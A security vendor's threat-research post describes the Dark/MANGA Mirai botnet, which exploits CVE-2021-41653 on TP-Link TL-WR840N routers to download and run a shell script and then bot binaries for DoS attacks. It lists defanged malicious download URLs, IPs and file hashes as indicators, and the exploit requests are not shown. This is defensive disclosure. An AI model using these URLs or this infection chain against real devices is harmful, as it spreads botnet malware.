Dark-Mirai Targets TP-Link Router

FortiGuard Labs discovered a malware sample that’s currently being distributed in the wild targeting TP-link wireless routers. It leverages a recently post-authenticated RCE vulnerability released recently. The campaign originally piqued our interest due to the continuous updating of its list of target vulnerabilities.TP-Link has already released an updated firmware for this affected hardware version and users are strongly encouraged to update their devices.

This Mirai-based botnet campaign is referred to as MANGA because of the token string it used to include in its SSH/telnet commands. It is also referred to as Dark due to the filenames used for its binaries (e.g., Dark.arm, dark.mips, etc.). 

By exploiting recently published vulnerabilities tracked as CVE-2021-41653, this malware campaign capitalizes on the gap between the time of disclosure of a vulnerability and the application of a patch to compromise IoT devices. This gives it a higher potential of spreading, making it more prolific than similar botnets. The latest addition to its constantly growing list of targeted vulnerabilities is TP-Link Home Wireless Routers, particularly the TL-WR840N EU (V5) model.

The vulnerability being exploited to force vulnerable devices to download and execute a malicious script, tshit.sh, which then downloads the main binary payloads, as discussed in the next section.

To accomplish this, the following requests are sent to the device:

Request 1:

Request 2:

It is important to emphasize that this exploitation requires authentication to succeed. Therefore, it is crucial for users to change their default credentials.As with Mirai’s normal infection routine, the executed shell script downloads the main payload binaries for different architectures and platforms and executes them blindly in the victim’s system. In addition, it prevents other botnets from taking over the device by blocking connections to commonly targeted ports.

The malware then waits for a command from its Command-and-Control (C2) server to perform different variations of a Denial-Of-Service (DOS) attack.

Fortinet customers are protected by the following:

• The following generic FortiGuard IPS signatures were able to detect this attack before this vulnerability was disclosed:
  • TP-Link.HTTP.Management.Code.Execution
  • TP-Link.Home.Wifi.Router.CGI.Referer.Command.Injection
• The FortiGuard Web Filtering Service blocks downloaded URLs and identified C2s.
• The FortiGuard Anti-Virus service detects and blocks this threat as Linux/Mirai and ELF/Mirai

Indicators of Compromise

Download URLs

• http[:]//194.85.248.176/bins/eh.x86
• http[:]//194.85.248.176/bins/eh.mips
• http[:]//194.85.248.176/bins/eh.mpsl
• http[:]//194.85.248.176/bins/eh.arm4
• http[:]//194.85.248.176/bins/eh.arm5
• http[:]//194.85.248.176/bins/eh.arm6
• http[:]//194.85.248.176/bins/eh.arm7
• http[:]//194.85.248.176/bins/eh.ppc
• http[:]//194.85.248.176/bins/eh.m68k
• http[:]//194.85.248.176/bins/eh.sh4
• http[:]//194.85.248.176/bins/eh.86_64
• http[:]//194.85.248.176/local.sh
• http[:]//194.85.248.176/tshit.sh
• http[:]//2.56.59.215/apache2.sh
• http[:]//212.192.241.72/lolol.sh

Samples (SHA256)

• ebfc95372427f8b845daff9ff4aebe2451fa78e35a24edd084685f06ba3daee4
• 57f50f34e6df8ee9006e46b5fe5c4ee11febe9e33b087c809f1384563e9f1d4e
• 8ebef715ddb0b4e973b2f8c7529f4480b5caa9c4a25f8fd05a7eaacf036cca20
• 113be1f9db8af2469b82ce1b5d1b0c61c50586567b3898f2b8a614cd6e8f47a8
• b4c3c79d148db638f891143a1910c3d17f973c512a719b1f7525a823b14d29a8
• d3928d0b6dedce6a083123028e50ba76e1b29666e70a96eec1a7061b7303bf1a
• 6b463e9f5d9e8edbc235bceb854367b26ed6effb0dee9881a4f4e88a967318d5
• d88052c0a76cac7e571870a4e87c5354594c26b4955cd934870dc12d48f129d5
• 265396023cbbad6b3480b851873ece9fa2f32c63739a7a0ac32d196843080cc8
• 83566400bdb09c5e2438c0d9ff723c88328ca93f29e648f97088342e239bfa09
• af9ac01e9e8cf7064d590044df43adca566521d223662cf5e0e2500badff6998
• de01f26209a085eeff8c217782d283640a6226ccf1bd27eefd696658b55d10ba
• a4b16a5bf9b6e662050a3c5ff157d7b2f0be301a1f8f5d1359170132b8b22e58
• 7a47e5b83e3c42df2ab72adf4a041b2e382f61a0ff378f593156353a78c2c702
• 1bd895ed050ce42d0f39b6baa0b6a454e05eb5bff72290857cb8fb77a9e4b4b9
• 71ca57bbba49aa877f7ded340328342c6e82e3a99720734c8b0de150d44d906c
• 23b03aa7d1dadd2e71016702f3e1b278b3a2c4f0c7d0cdc272774a428b88d09c
• fb7b03e7619d3ac5c4cbadc6b38841b11e3b19214b776073a590b571f91fe51e
• 3c978e02d21c7c12631d56c41aceb305fc11348a53eed47e29f7ce62ea0da4df
• 4832cff5666433a784d6ba48a0e400367d25314ef15d08a216b6286226eff342
• 95e4ac3ae03646cda56d80df80d775ed4bf23f98be42274fb440e7bc0d03ce88
• 8d390ad5af8d70692bda123b96e9745816ec7893d84682adb6d243619538b9d3
• 66adea50e0de8e1d664bb18c9f80596d1443b90e9ba57a59425720886a0c97e0
• a87b502575d0db1b6257f1cf75edf4894bc84598f79148525b5cc449d143a495